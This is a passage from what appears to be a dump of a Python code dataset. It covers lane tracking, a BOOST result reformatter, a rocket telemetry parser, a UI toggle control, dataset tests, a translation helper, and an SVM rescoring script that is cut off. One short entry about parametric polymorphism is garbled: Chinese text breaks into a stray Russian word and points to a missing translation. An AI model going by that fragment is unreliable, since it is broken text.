            bounding_box.lane_id = detect_position(bounding_box, valid_mask, distance_mask, lane_masks_list)
            linked_bounding_box = link_bounding_box(bounding_box, open_bounding_boxes_list)
            if linked_bounding_box:
                add_bounding_box(bounding_box, linked_bounding_box, cached_bounding_boxes_list, open_bounding_boxes_list, closed_bounding_boxes_list)
            elif bounding_box.lane_id > 0:
                # An unlinked box on a real lane starts a new track.
                cached_bounding_boxes_list.append(bounding_box)
        open_bounding_boxes_list.extend(cached_bounding_boxes_list)
        clean(seq_id, open_bounding_boxes_list, closed_bounding_boxes_list)
    closed_bounding_boxes_list.extend(open_bounding_boxes_list)
    save_tracks(direction, closed_bounding_boxes_list)
    # show_brief(closed_bounding_boxes_list)
    # show_detail(closed_bounding_boxes_list)
    export_tracks(direction, closed_bounding_boxes_list)
def detect_tracks(op: str) -> None:
    """Run detection for an op string shaped 'tracks-<direction>-<last_frame>'."""
    tokens = op.split('-')
    _, direction, last_frame = tokens
    detect_single_direction_tracks(direction, last_frame)
if __name__ == '__main__':
    # Smoke-test variants limited to the first 100 frames per direction:
    # detect_tracks("tracks-north-00100")
    # detect_tracks("tracks-south-00100")
    # detect_tracks("tracks-west-00100")
    # detect_tracks("tracks-east-00100")
    # Full runs -- 99999 exceeds any sequence id, so no frames are skipped.
    detect_tracks("tracks-north-99999")
    detect_tracks("tracks-south-99999")
    detect_tracks("tracks-west-99999")
    detect_tracks("tracks-east-99999")
|
24,138 | cc6bb812069a194a30960c12b3c431d7565c1fb1 | #Exercise: this file is to illustrate how to use (block) comments
# print ('this is a test')
# On the day of 2/22/2017, found a bug: JIRA 7862
# HJ
print ('this is not a test')
# not recommended
# The bare expressions below are no-ops, kept from the original exercise.
...
1
1
1
1
1
1
...
|
24,139 | f6a504e608e529e9735c5ff192ea95712e778de8 | print()
# Print the Unicode code point of each sample character, one per line.
for sample_char in "Mmt":
    print(ord(sample_char))
print(ord('4')) |
24,140 | b6c127c0334c1bc52e0c0b33ce1c442c6710f88a | ###############################################################################
###############################################################################
## Function:
##   Reads the original BOOST result file (MIGen_InteractionRecords.txt) and
##   the plink map file (MIGen_QC.map), and writes the reformatted BOOST
##   results to results_MIGen_BOOST.txt, sorted by interaction chi-square.
################################################################################
from itertools import islice
from scipy.stats import chi2

# --- Load the plink .map file: one marker per line, whitespace separated. ---
# Column 0 = chromosome, column 1 = SNP id, column 3 = base-pair position.
CHRs = []
SNPs = []
BPs = []
with open(r"MIGen_QC.map", mode='r') as ori_file_map:
    for line in ori_file_map:
        statistics = line.split()
        CHRs.append(statistics[0])
        SNPs.append(statistics[1])
        BPs.append(statistics[3])

# The indices of SNPs in the three (first, last, remain) result files start from 0
all_list = []
with open(r"MIGen_InteractionRecords.txt", mode='r') as ori_file:
    while True:
        # Read the interaction records in chunks of 20 lines.
        next_n_lines = list(islice(ori_file, 20))
        if not next_n_lines:
            break
        for line in next_n_lines:
            if len(line) == 0:
                continue
            sample = line.split()
            # Output row layout:
            # IND1 IND2 InteractionBOOST SNP1 SNP2 BP1 BP2 InteractionPVal CHR1 CHR2
            # For GBOOST results: use float(sample[5])
            # For GBOOST2 results: use float(sample[3])
            chi4GBOOST = sample[5]
            # p-value of the interaction chi-square statistic (4 degrees of freedom).
            pGBOOST = 1 - chi2.cdf(float(chi4GBOOST), 4)
            all_list.append([sample[1], sample[2], chi4GBOOST,
                             SNPs[int(sample[1])], SNPs[int(sample[2])],
                             BPs[int(sample[1])], BPs[int(sample[2])],
                             str(pGBOOST), CHRs[int(sample[1])], CHRs[int(sample[2])]])

# BUG FIX: tup[2] is the chi-square value as a *string*; sorting on it compared
# lexicographically (e.g. "9.5" > "10.2"), producing a wrongly ordered output
# file.  Sort numerically instead.
all_list_sorted = sorted(all_list, key=lambda tup: float(tup[2]), reverse=True)

with open(r"results_MIGen_BOOST.txt", mode='w+') as result_file:
    for ele in all_list_sorted:
        result_file.write(' '.join(ele) + '\n')
|
24,141 | b02560bd852d3cc471ec5aa5f9da60283f5e7fbc | #!/usr/bin/env python
import sys
import os
import subprocess

# Name of the new (cloned) package, taken from the command line.
clone_to = sys.argv[1]
cwd = os.getcwd()

# Create the target project layout next to the current directory.
os.mkdir('../%s' % (clone_to,))
os.mkdir('../%s/%s' % (clone_to, clone_to))

# Copy the template files, rewriting every occurrence of the template
# package name "anisble" to the new package name (in both file paths and
# file contents).  Context managers fix the original's leaked read handles.
for fn in ['setup.py', 'README', 'anisble/__init__.py']:
    dest = '../%s/%s' % (clone_to, fn.replace('anisble', clone_to))
    with open(fn) as ifs, open(dest, 'w') as ofs:
        ofs.write(ifs.read().replace('anisble', clone_to))

# Build and upload the cloned package, always restoring the original cwd.
os.chdir('../%s' % (clone_to,))
try:
    subprocess.check_call(['python', 'setup.py', 'sdist', 'upload'])
finally:
    os.chdir(cwd)
|
24,142 | 4379abd437cd16311ea6b208ffee639139486bb6 | import struct
from dataclasses import dataclass
from math import pow
@dataclass
class RocketData:
    """One telemetry packet, field-for-field.

    Field order matches the little-endian wire layout
    "<2sIffffffffffffff2s" decoded by SerialParser.unpackData.
    """
    start : bytes = b'\xff\xff'      # packet start marker
    timestamp : int = 0
    Hts_temperature : float = 0  # celsius
    Lps_pressure : float = 0  # kiloPascals
    # IMU readings: accelerometer, gyroscope, magnetometer (3 axes each).
    # Units not established here — confirm against the firmware.
    Imu_accelX : float = 0
    Imu_accelY : float = 0
    Imu_accelZ : float = 0
    Imu_gyroX : float = 0
    Imu_gyroY : float = 0
    Imu_gyroZ : float = 0
    Imu_magX : float = 0
    Imu_magY : float = 0
    Imu_magZ : float = 0
    Gps_lat : float = 0
    Gps_lng : float = 0
    Gps_altitude : float = 0
    end : bytes = b'\xA4\x55'        # packet end marker

# Total packet size in bytes: 2 (start) + 4 (timestamp) + 14*4 (floats) + 2 (end).
DATA_LEN = 64
class SerialParser:
    """Splits a raw serial byte stream into packets and decodes them."""

    def __init__(self, data):
        self.data = data          # most recently decoded RocketData
        self.data_queue = []      # recent packets, bounded at 50 (debug aid)
        self.numpackages = 0      # candidate packets seen so far
        self.loss = 0             # candidates dropped for having the wrong length

    def findPackage(self, stream):
        '''
        Reads the serial data (bytes), picks out packages and feeds each
        complete one through unpackData/updateData.
        '''
        # Split the hex form of the stream on the 'ffff' start marker.
        # NOTE(review): 'ffff' can also occur inside float payload bytes,
        # which would split a packet in two; such fragments fail the length
        # check below and are counted as loss rather than decoded wrongly.
        packages = stream.hex().split('ffff')
        for package in packages:
            if package:
                self.numpackages += 1
                # Re-attach the start marker consumed by split().
                package = 'ffff' + package
                # Two hex characters per byte.
                if len(package) != DATA_LEN * 2:
                    self.loss += 1
                    continue
                unpacked = self.unpackData(bytes.fromhex(package))
                self.updateData(unpacked)

    def unpackData(self, package):
        '''
        Decode one complete DATA_LEN-byte packet *including* its start and
        end marker bytes, using the little-endian layout
        "<2sIffffffffffffff2s".  Returns a tuple in RocketData field order.
        (The previous docstring wrongly claimed the markers were excluded.)
        '''
        unpacked = struct.unpack("<2sIffffffffffffff2s", package)
        return unpacked

    def updateData(self, update):
        '''
        updates RocketData after newly unpacked data is available
        '''
        # Imported lazily to avoid a circular import at module load time —
        # TODO confirm; recordCsv is a sibling project module.
        import recordCsv
        data = RocketData(*update)
        self.data = data
        recordCsv.convertPackage(data)
        # thought a queue could be helpful maybe, at least for debugging it is
        self.data_queue.append(data)
        if len(self.data_queue) > 50:
            self.data_queue.pop(0)
# real data package:
_real = '\xff\xfff\x90\xe1AjJ\xc9B\x00@\x0e>\x00\x00\x06\xbd\x00\x80z?\x00\x80;\xbe\x00\xa0\x0c?\x00\x00z=\x00@N@\x00T\xd3A\x80\xd0\x06B\x00\x00\x00\x00\x00\x00\x00\x00\x87u\x14\x00\xa4U'
# a fake but easy to test with one:
_package = b'\x31\x99\xc3\x41\xca\x15\xc8\x42\x00\x00\x03\x3d\x00\x00\x84\xbd\x00\x08\x7d\x3f\x00\x40\x9c\x3e\x00\xe8\x00\x40\x00\x00\x7a\x3e\x00\x86\x3a\x41\x80\x88\x12\x42\x00\x1f\x95\xc1\xd0\x46\x08\x42\x18\xe3\xec\xc2\x00\x00\x00\x00'
_raw = b'\x12\x00\xa1\x7e\xff\xff\x31\x99\xc3\x41\xca\x15\xff\xff\xc8\x42\x00\x00\x03\x3d\x00\x00\x84\xbd\x00\x08\x7d\x3f\x00\x40\x9c\x3e\x00\xe8\x00\x40\x00\x00\x7a\x3e\x00\x86\x3a\x41\x80\x88\x12\x42\x00\x1f\x95\xc1\xd0\x46\x08\x42\x18\xe3\xec\xc2\x00\x00\x00\x00\xa4\x55'\
b'\xff\xff\x31\x98\xc2\x41\xca\x15\xc8\x42\x00\x00\x03\x3e\x00\x00\x84\xbd\x00\x08\x75\x3f\x00\x40\x9c\x3e\x00\xe8\x00\x40\x00\x00\x9a\x3e\x00\x86\x3a\x41\x80\x88\x12\x42\x00\x1f\x95\xc1\xd0\x46\x08\x42\x23\xe3\xec\xc2\xc2\xed\x1e\x10\x00\x00\x00\x00\xa4\x55'
|
24,143 | 2cd297229f08d32848bf857a2561e0174ba5f743 | from .utils import encode_attr
from .control import Control
class Toggle(Control):
    """A toggle (on/off switch) control.

    All state is stored through the Control attribute helpers
    (_get_attr/_set_attr); the wire control name is "toggle".
    The only code change vs. the original is the idiomatic
    ``value is None`` comparison (was ``value == None``).
    """

    def __init__(self, label=None, id=None, value=None, inline=None,
                 on_text=None, off_text=None, data=None, onchange=None,
                 width=None, height=None, padding=None, margin=None,
                 visible=None, disabled=None):
        Control.__init__(self, id=id,
                         width=width, height=height, padding=padding, margin=margin,
                         visible=visible, disabled=disabled)
        self.value = value
        self.label = label
        self.inline = inline
        self.on_text = on_text
        self.off_text = off_text
        self.data = data
        self.onchange = onchange

    def _getControlName(self):
        return "toggle"

    # onchange
    @property
    def onchange(self):
        # Event handlers are write-only; reading always yields None.
        return None

    @onchange.setter
    def onchange(self, handler):
        self._add_event_handler("change", handler)

    # value — the on/off state; must be a bool or None.
    @property
    def value(self):
        return self._get_attr("value")

    @value.setter
    def value(self, value):
        assert value is None or isinstance(value, bool), "value must be a boolean"
        self._set_attr("value", value)

    # label
    @property
    def label(self):
        return self._get_attr("label")

    @label.setter
    def label(self, value):
        self._set_attr("label", value)

    # inline — must be a bool or None.
    @property
    def inline(self):
        return self._get_attr("inline")

    @inline.setter
    def inline(self, value):
        assert value is None or isinstance(value, bool), "value must be a boolean"
        self._set_attr("inline", value)

    # on_text — text shown while the toggle is on.
    @property
    def on_text(self):
        return self._get_attr("onText")

    @on_text.setter
    def on_text(self, value):
        self._set_attr("onText", value)

    # off_text — text shown while the toggle is off.
    @property
    def off_text(self):
        return self._get_attr("offText")

    @off_text.setter
    def off_text(self, value):
        self._set_attr("offText", value)

    # data — arbitrary user payload attached to the control.
    @property
    def data(self):
        return self._get_attr("data")

    @data.setter
    def data(self, value):
        self._set_attr("data", value)
|
24,144 | 674665dc9c650aad22f00bf6d29df0b871bc00d6 | import torch
import pytest
from binding_prediction.dataset import (
DrugProteinDataset, PosDrugProteinDataset,
collate_fn, _load_datafile)
from binding_prediction.utils import get_data_path
class TestDataUtils(object):
    """Unit tests for the datafile loading helper."""

    def test_load(self):
        # example.txt yields parallel lists: SMILES strings and protein sequences.
        fname = get_data_path('example.txt')
        smiles, prots = _load_datafile(fname)
        assert(smiles[0] == 'CC(=O)OC(CC(=O)[O-])C[N+](C)(C)C')
        exp = ('MVLAWPDRYSSVQLELPEGATVAEAVATSGLALQQAPAAHAVHGLVARPEQ'
               'VLRDGDRVELLRPLLLDPKEARRRRAGPSKKAGHNS')
        assert(prots[1] == exp)
class TestDrugProteinDataset(object):
    """Shape and negative-sampling behaviour of DrugProteinDataset."""

    @pytest.mark.parametrize('precompute', [True, False])
    @pytest.mark.parametrize('multiple_bond_types', [True, False])
    def test_output_shapes(self, precompute, multiple_bond_types):
        # First entry of example.txt is expected to produce 14 graph nodes.
        dset = DrugProteinDataset("data/example.txt", precompute=precompute,
                                  multiple_bond_types=multiple_bond_types)
        first_element = dset[0]
        assert(first_element['node_features'].shape[0] == 14)
        assert(first_element['adj_mat'].shape[0] == 14)
        assert(first_element['adj_mat'].shape[1] == 14)
        assert(first_element['is_true'])
        # With multiple bond types the adjacency matrix gains a third axis.
        if multiple_bond_types:
            assert(len(first_element['adj_mat'].shape) == 3)
        else:
            assert(len(first_element['adj_mat'].shape) == 2)

    @pytest.mark.parametrize('precompute', [True, False])
    def test_sampling(self, precompute):
        # Force the fake-pair path: per the assertions below, the fake
        # element should take its drug from index 1 and its protein from
        # index 2 of the reference (all-true) dataset.
        def fake_dist():
            return 1, 2
        rand_dset = DrugProteinDataset("data/example.txt", precompute=True,
                                       prob_fake=1., fake_dist=fake_dist)
        ref_dset = DrugProteinDataset("data/example.txt", precompute=True,
                                      prob_fake=0.)
        fake_element = rand_dset[0]
        true_element_1 = ref_dset[1]
        true_element_3 = ref_dset[2]
        assert(torch.norm(fake_element['node_features'] - true_element_1['node_features']) < 1e-6)
        assert(torch.norm(fake_element['adj_mat'] - true_element_1['adj_mat']) < 1e-6)
        assert(fake_element['protein'] == true_element_3['protein'])
        assert(fake_element['is_true'] == 0)
class TestPosDrugProteinDataset(object):
    """Basic __getitem__ behaviour of PosDrugProteinDataset."""

    def test_getitem(self):
        datafile = get_data_path('sample_dataset2.txt')
        db = PosDrugProteinDataset(datafile=datafile, num_neg=2)
        res = db[0]
        # Expected protein sequence of the first sample in sample_dataset2.txt.
        exp_seq = ('MDVLLANPRGFCAGVDRAIEIVKRAIETLGAPIYVRHEVVHNRFVV'
                   'DDLKQRGAIFVEELDEVPDDATVIFSAHGVSQAVRQEAERRGLKVF'
                   'DATCPLVTKVHFEVARHCRAGRDVVLIGHAGHPEVEGTMGQWSRER'
                   'GAGTIYLVEDIEQVATLDVRQPDNLAYTTQTTLSVDDTMGIIEALR'
                   'ARYPAMQGPRHDDICYATQNRQDAVRDLARQCDLVLVVGSPNSSNS'
                   'NRLSELARRDGVESYLIDNASEIDPAWIVGKQHIGLTAGASAPQVL'
                   'VDGVLERLRELGAAGVSELEGEPESMVFALPKELRLRLVS')
        assert(res['protein'] == exp_seq)
def test_collate_fxn():
    """collate_fn must zero-pad every sample to the batch maxima and keep
    each original tensor intact in its top-left corner."""
    node_features = [torch.randn(13, 4), torch.randn(8, 4), torch.randn(15, 4)]
    protein = [torch.randn(40, 2), torch.randn(15, 2), torch.randn(30, 2)]
    adj_mat = [torch.randint(2, (13, 13)).float(), torch.randint(2, (8, 8)).float(),
               torch.randint(2, (15, 15)).float()]
    is_true = [1, 1, 0]
    input_batches = []
    for n_i, p_i, a_i, t_i in zip(node_features, protein, adj_mat, is_true):
        sample_i = {'node_features': n_i, 'protein': p_i, 'adj_mat': a_i, 'is_true': t_i}
        input_batches.append(sample_i)
    collated_batch = collate_fn(input_batches)
    # Padded batch shapes: max drug size 15, max protein length 40.
    assert(collated_batch['node_features'].shape == (3, 15, 4))
    assert(collated_batch['protein'].shape == (3, 40, 2))
    assert(torch.norm(collated_batch['is_true'] - torch.tensor([1., 1., 0.])) < 1e-6)
    # Each original (unpadded) tensor must survive the collation unchanged.
    for i, (n_i, p_i, a_i) in enumerate(zip(node_features, protein, adj_mat)):
        drug_size, drug_channels = n_i.shape
        prot_size, prot_channels = p_i.shape
        batched_n_i = collated_batch['node_features'][i][:drug_size, :drug_channels]
        assert(torch.norm(batched_n_i - n_i) < 1e-4)
        batched_p_i = collated_batch['protein'][i][:prot_size, :prot_channels]
        assert(torch.norm(batched_p_i - p_i) < 1e-4)
        batched_a_i = collated_batch['adj_mat'][i][:drug_size, :drug_size]
        assert(torch.norm(batched_a_i - a_i) < 1e-4)
|
24,145 | a4967cd76294460baa6ea2331bb0c2101984ff44 | from googletrans import Translator as GoogleTrans
from datamuse import datamuse
translator = GoogleTrans()
similar_finder = datamuse.Datamuse()
def get_translation(word, src=None, dest='en'):
    """Translate *word* into *dest* and collect alternative translations.

    Parameters
    ----------
    word : str
        The word or phrase to translate.
    src : str or None
        Source language code.  BUG FIX: this parameter previously had no
        default, so the single-argument call in ``__main__`` below raised
        TypeError.  None (the default) lets Google auto-detect the language,
        matching the existing ``if src:`` branch; existing callers that pass
        ``src`` are unaffected.
    dest : str
        Target language code (default 'en').

    Returns a dict with keys 'target', 'result', 'from_google' and
    'extra_similarity'.
    """
    if src:
        res = translator.translate(word, src=src, dest=dest)
    else:
        res = translator.translate(word, dest=dest)
    translation = {}
    translation['target'] = word
    translation['result'] = res.text
    translation['from_google'] = []
    translation['extra_similarity'] = []
    # 'all-translations' groups alternatives by part of speech (item[0]);
    # each alternative row i has its 4th column (i[2]) dropped.
    if res.extra_data['all-translations']:
        for item in res.extra_data['all-translations']:
            translation['from_google'].append((item[0], [i[:2] + i[3:] for i in item[2]]))
    # When Google offers little, fall back to Datamuse "means like" words.
    if len(translation['from_google']) <= 1:
        text = res.text
        # datamuse only support english similar words right now
        if dest == 'en':
            similars = similar_finder.words(ml=text, max=4)
            for item in similars:
                translation['extra_similarity'].append([item['word'],
                                                        [i for i in item.get("tags", []) if i != 'syn'],
                                                        item['score']])
    print(translation)  # debug output; consider removing once stable
    return translation


if __name__ == "__main__":
    word = '相似'
    translation = get_translation(word)
    print(translation)
24,146 | c053544c25841d0cec0beef1f6cb74fd5c145362 |
## Parametric polymorphism (参数化多态性)
# map
"""
编译器编写者必须彻底地研究元语言的类型系统
"""
# Translation of the Chinese docstring above: "Compiler writers must study
# the meta-language's type system thoroughly."

## Some questions (一些问题)
"""
1. 动态类型语言的运算符重载是如何实现的?
请описать... (see translation below)
"""
24,147 | 133b99e346fac81dabd9a759c97b5f2357544416 | n = int(input())
# Smallest prime factor of n (n itself when n is prime).
# BUG FIX: the original scanned i = 2, 3, ... until n % i == 0, which never
# terminates for n == 1 (1 % i is never 0).  Trial division only needs to
# reach sqrt(n): if no divisor is found by then, n is prime.  For n == 1
# this now prints 1 instead of hanging; behaviour for n >= 2 is unchanged.
i = 2
while i * i <= n and n % i != 0:
    i += 1
print(i if n % i == 0 else n)
|
24,148 | 215c54ae08333c6e6b44cf0ee710c93111f54c7a | #!/usr/bin/env python
"""
usage:
svm.py unified_input.csv engine_score_column_name
i.e. :
svm.py omssa_2_1_6_unified.csv 'OMSSA:pvalue'
Writes a new file with added column "SVMscore" which is the distance to
the separating hyperplane of a Percolator-like support vector machine.
"""
import numpy as np
import sklearn
from sklearn import svm
from sklearn.cross_validation import StratifiedKFold
from sklearn.preprocessing import Imputer
from collections import Counter, defaultdict
from random import random
import csv
import re
import os
import argparse
from misc import (
get_score_colname_and_order,
field_to_float,
unify_sequence,
calc_FDR,
scale_scores,
row_is_decoy,
field_to_bayes_float,
get_mz_values,
)
SCALER = (
sklearn.preprocessing.RobustScaler()
) # RobustScaler() seems to be most robust ;)
PROTON = 1.00727646677
class SVMWrapper(dict):
    def __init__(self):
        """Set up option storage, counters and per-run lookup tables."""
        self._svm_score_name = "SVMscore"
        self.counter = {  # counting the # of possible training PSMs
            "target": 0,
            "decoy": 0,
            "positive": 0,
            "negative": 0,
            "unknown": 0,
            "parsed PSMs": 0,
        }
        self.results = {}  # scaled-feature-tuple -> SVM decision-function score
        self.shitty_decoy_seqs = set()  # is overwritten by find_shitty_decoys()
        self.mgf_lookup = {}
        self.pep_to_mz = {}
        # Only parse CLI options when executed as a script, not on import.
        if __name__ == "__main__":
            self.parse_options()  # parse command line args and set options
            self.set_input_csv()
        self.observed_charges = set()
        self.used_extra_fields = set()
        self.decoy_train_prob = (
            None  # probability to include decoy PSMs as negative training examples
        )
        self.maximum_proteins_per_line = 0
        self.tryptic_aas = set(["R", "K", "-"])
        self.delim_regex = re.compile(
            r"<\|>|\;"
        )  # regex to split a line by both ";" and "<|>"
        return
def parse_options(self):
"""
parses the command line args for options/parameters
"""
parser = argparse.ArgumentParser()
parser.add_argument(
"-i",
"--input_csv",
type=str,
help="Input CSV path(s)",
required=True,
nargs="+",
)
parser.add_argument(
"-o", "--output_csv", type=str, help="Output CSV path", required=True
)
parser.add_argument(
"-k",
"--kernel",
type=str,
default="rbf",
help='SVM kernel type ("rbf", "linear", "poly" or "sigmoid")',
)
parser.add_argument(
"-c", type=float, default=1.0, help="Penalty parameter C of the error term"
)
parser.add_argument(
"-g",
"--gamma",
type=str,
default="auto",
help="Gamma parameter of the SVM.",
)
parser.add_argument(
"-r",
"--mb_ram",
type=float,
default=4000,
help="Available RAM in megabytes, for SVM calculation",
)
parser.add_argument(
"-f",
"--fdr_cutoff",
type=float,
default=0.01,
help="Target PSMs with a lower FDR will be used as a "
"positive training set",
)
parser.add_argument(
"-x",
"--columns_as_features",
type=str,
nargs="+",
default=[
"MS-GF:RawScore",
"MS-GF:DeNovoScore",
"MS-GF:SpecEValue",
"MS-GF:EValue",
"OMSSA:evalue",
"OMSSA:pvalue",
"X\!Tandem:expect",
"X\!Tandem:hyperscore",
],
help="Columns that should be used as a feature directly "
"(e.g. secondary scores). Will be converted to float",
)
parser.add_argument(
"-d",
"--dump_svm_matrix",
type=str,
default=False,
help="Dump SVM matrix in PIN (Percolator input) format "
"to the specified path, mostly for debugging "
"and benchmarking.",
)
arg_dict = vars(parser.parse_args()) # convert to dict
self.update(arg_dict)
try:
self["gamma"] = float(self["gamma"])
except ValueError:
assert (
self["gamma"] == "auto"
), "Invalid gamma param: " '"{0}", using "auto" instead.'.format(
self["gamma"]
)
def set_input_csv(self):
"""
distinguishes one vs. many unified input csv files and either
sets the single csv as input, or merges all csvs and sets
the merged csv as input.
"""
if len(self["input_csv"]) > 1:
raise Exception("You must only specify *one* unified CSV file!")
self.csv_path = self["input_csv"][0]
print("Using input file", self.csv_path)
    def find_shitty_decoys(self):
        """
        Finds and notes decoys that share their sequence with a target PSM.
        Also counts the number of targets and decoys to get a quick estimate
        of how many positive/negative training examples can be "claimed".
        """
        target_seqs = set()
        decoy_seqs = set()
        with open(self.csv_path, "r") as f:
            reader = csv.DictReader(f)
            # Rows sorted best-score-first by the engine score column.
            sorted_reader = sorted(
                reader,
                reverse=self["bigger_scores_better"],
                key=lambda d: float(d[self.col_for_sorting]),
            )
            for row in sorted_reader:
                self.observed_charges.add(int(row["Charge"]))
                if row_is_decoy(row):
                    decoy_seqs.add(unify_sequence(row["Sequence"]))
                    self.counter["decoy"] += 1
                else:
                    target_seqs.add(unify_sequence(row["Sequence"]))
                    self.counter["target"] += 1
        # Sequences seen as both target and decoy are excluded from training.
        self.shitty_decoy_seqs = target_seqs.intersection(decoy_seqs)
        if len(self.shitty_decoy_seqs) > 0:
            print(
                "Warning! Found {0} sequences that are target AND decoy "
                "(immutable peptides?). These will not be used for training.\n".format(
                    len(self.shitty_decoy_seqs)
                )
            )
        return
    def determine_csv_sorting(self):
        """Pick the engine score column and its sort order from the CSV header;
        also record which optional -x feature columns are actually present."""
        with open(self.csv_path, "r") as in_file:
            reader = csv.DictReader(in_file)
            (
                self.col_for_sorting,
                self["bigger_scores_better"],
            ) = get_score_colname_and_order(reader.fieldnames)
        # Avoid clobbering an existing "SVMscore" column from a previous run.
        if self.col_for_sorting == self._svm_score_name:
            self._svm_score_name = self._svm_score_name + "2"
        print(
            "CSV will be sorted by column {0} (reverse={1}"
            ")".format(self.col_for_sorting, self["bigger_scores_better"])
        )
        for feat in self["columns_as_features"]:
            if feat in reader.fieldnames and feat != self.col_for_sorting:
                self.used_extra_fields.add(feat)
def sort_by_rank(self, rowdict):
score = float(rowdict[self.col_for_sorting])
spec_title = rowdict["Spectrum Title"]
return (spec_title, score)
@staticmethod
def parse_protein_ids(csv_field, sep="<|>"):
"""
Turns the unified CSV column "Protein ID"
into a set of all protein IDs.
"""
clean = csv_field.replace("decoy_", "").strip()
prot_id_set = set(clean.split(sep))
return prot_id_set
def count_intra_set_features(self):
"""
intra-set features as calculated by Percolator:
- num_pep: Number of PSMs for which this is the best scoring peptide.
- num_prot: Number of times the matched protein matches other PSMs.
- pep_site: Number of different peptides that match this protein.
own ideas:
- pep_charge_states: in how many charge states was the peptide found?
- seq_mods: in how many mod states was the AA-sequence found?
- num_spec: Number of times the matched spectrum matches other peptides.
"""
print("Counting intra-set features...")
self.num_pep = defaultdict(int)
self.num_prot = defaultdict(set)
self.pep_site = defaultdict(set)
self.score_list_dict = defaultdict(list)
self.pep_charge_states = defaultdict(set)
self.seq_mods = defaultdict(set)
self.num_spec = defaultdict(set)
with open(self.csv_path, "r") as f:
reader = csv.DictReader(f)
previous_spec_title = None
rows_of_spectrum = []
for row in sorted(
reader, reverse=self["bigger_scores_better"], key=self.sort_by_rank
):
if unify_sequence(row["Sequence"]) in self.shitty_decoy_seqs:
continue
current_spec_title = row["Spectrum Title"]
if current_spec_title != previous_spec_title:
# the next spectrum started, so let's process the info we
# collected for the previous spectrum:
score_list = [
field_to_bayes_float(r[self.col_for_sorting])
for r in rows_of_spectrum
]
self.score_list_dict[previous_spec_title] = score_list
for rank, line in enumerate(rows_of_spectrum):
# print("\t".join([
# str(rank), line['Spectrum Title'], line[self.col_for_sorting]
# ]))
uni_sequence = unify_sequence(line["Sequence"])
peptide = (uni_sequence, line["Modifications"])
# multiple proteins are separated by <|>
# ignore start_stop_pre_post part since it depends on the peptide
# and not the protein (i.e. _233_243_A_R)
proteins = set(
line["Protein ID"].replace("decoy_", "").split(";")
)
# old unify csv format:
# proteins = self.parse_protein_ids(
# line['proteinacc_start_stop_pre_post_;']
# )
if len(proteins) > self.maximum_proteins_per_line:
self.maximum_proteins_per_line = len(proteins)
if rank == 0:
# this is the 'best' peptide for that spectrum
self.num_pep[peptide] += 1
for protein in proteins:
self.num_prot[protein].add(
(
line["Spectrum Title"],
uni_sequence,
line["Modifications"],
)
)
self.pep_site[protein].add(peptide)
self.pep_charge_states[peptide].add(int(row["Charge"]))
self.seq_mods[uni_sequence].add(row["Modifications"])
self.num_spec[line["Spectrum Title"]].add(peptide)
rows_of_spectrum = []
rows_of_spectrum.append(row)
previous_spec_title = current_spec_title
def row_to_features(self, row):
"""
Converts a unified CSV row to a SVM feature matrix (numbers only!)
"""
sequence = unify_sequence(row["Sequence"])
charge = field_to_float(row["Charge"])
score = field_to_bayes_float(row[self.col_for_sorting])
calc_mz, exp_mz, calc_mass, exp_mass = get_mz_values(row)
# calc_mz = field_to_float( row['Calc m/z'] ) # calc m/z or uCalc?
# exp_mz = field_to_float( row['Exp m/z'] )
pre_aa_field = row["Sequence Pre AA"]
post_aa_field = row["Sequence Post AA"]
all_pre_aas = set(re.split(self.delim_regex, pre_aa_field))
all_post_aas = set(re.split(self.delim_regex, post_aa_field))
if any(pre_aa not in self.tryptic_aas for pre_aa in all_pre_aas):
enzN = 0
else:
enzN = 1
if any(post_aa not in self.tryptic_aas for post_aa in all_post_aas):
enzC = 0
else:
enzC = 1
n_missed_cleavages = len(
[aa for aa in sequence[:-1] if aa in ["R", "K"]]
) # / len(sequence)
missed_cleavages = [0] * 6
try:
missed_cleavages[n_missed_cleavages] = 1
except IndexError: # if a peptide has more than 6 missed cleavages
missed_cleavages[-1] = 2
spectrum = row["Spectrum Title"].strip()
mass = (exp_mz * charge) - (charge - 1) * PROTON
pep_len = len(sequence)
# delta_mz = calc_mz - exp_mz
delta_mass = calc_mass - exp_mass
peptide = (sequence, row["Modifications"])
proteins = self.parse_protein_ids(row["Protein ID"])
num_pep = self.num_pep[peptide]
pep_charge_states = len(self.pep_charge_states[peptide])
seq_mods = len(self.seq_mods[sequence])
num_spec = len(self.num_spec[row["Spectrum Title"]])
num_prot = sum((len(self.num_prot[protein]) for protein in proteins))
pep_site = sum((len(self.pep_site[protein]) for protein in proteins))
user_specified_features = []
for feat in self.used_extra_fields:
if feat != self.col_for_sorting:
try:
user_specified_features.append(field_to_float(row[feat]))
except ValueError:
pass
charges = defaultdict(int)
for charge_n in sorted(self.pep_charge_states[peptide]):
charges[charge_n] = 1
if sequence in self.shitty_decoy_seqs:
is_shitty = 1
else:
is_shitty = 0
score_list = sorted(
list(set(self.score_list_dict[spectrum])),
reverse=self["bigger_scores_better"],
)
try:
score_list_scaled = scale_scores(score_list)
rank = score_list.index(score)
deltLCn = (
score_list_scaled[rank] - score_list_scaled[1]
) # Fractional difference between current and second best XCorr
deltCn = (
score_list_scaled[rank] - score_list_scaled[-1]
) # Fractional difference between current and worst XCorr
except (ValueError, IndexError, AssertionError):
# NaN values will be replaced by the column mean later
# NaN values are entered when there is no ranking
# e.g. when only one peptide was matched to the spectrum.
rank, deltLCn, deltCn = np.nan, np.nan, np.nan
features = [
score,
rank,
deltCn,
deltLCn,
charge,
# delta_mz,# / pep_len,
delta_mass, # / pep_len,
# abs(delta_mz),# / pep_len,
abs(delta_mass), # / pep_len,
n_missed_cleavages / pep_len,
missed_cleavages[0],
missed_cleavages[1],
missed_cleavages[2],
missed_cleavages[3],
missed_cleavages[4],
missed_cleavages[5],
enzN,
enzC,
mass,
pep_len,
num_pep,
num_prot,
pep_site,
is_shitty,
pep_charge_states,
num_spec,
seq_mods,
]
for charge_n in self.observed_charges:
features.append(charges[charge_n])
return features + user_specified_features
def collect_data(self):
"""
parses a unified csv file and collects features from each row
"""
categories = []
list_of_feature_lists = []
feature_sets = set()
with open(self.csv_path, "r") as f:
reader = csv.DictReader(f)
# collecting some stats for FDR calculation:
self.PSM_count = 0
self.decoy_count = 0
if self["dump_svm_matrix"]:
self.init_svm_matrix_dump()
additional_matrix_info = []
for i, row in enumerate(
sorted(
reader,
reverse=self["bigger_scores_better"],
key=lambda d: float(d[self.col_for_sorting]),
)
):
features = self.row_to_features(row)
if tuple(features) in feature_sets:
continue
feature_sets.add(tuple(features))
category, psm_FDR = self.get_psm_category(row)
list_of_feature_lists.append(features)
categories.append(category)
if self["dump_svm_matrix"]:
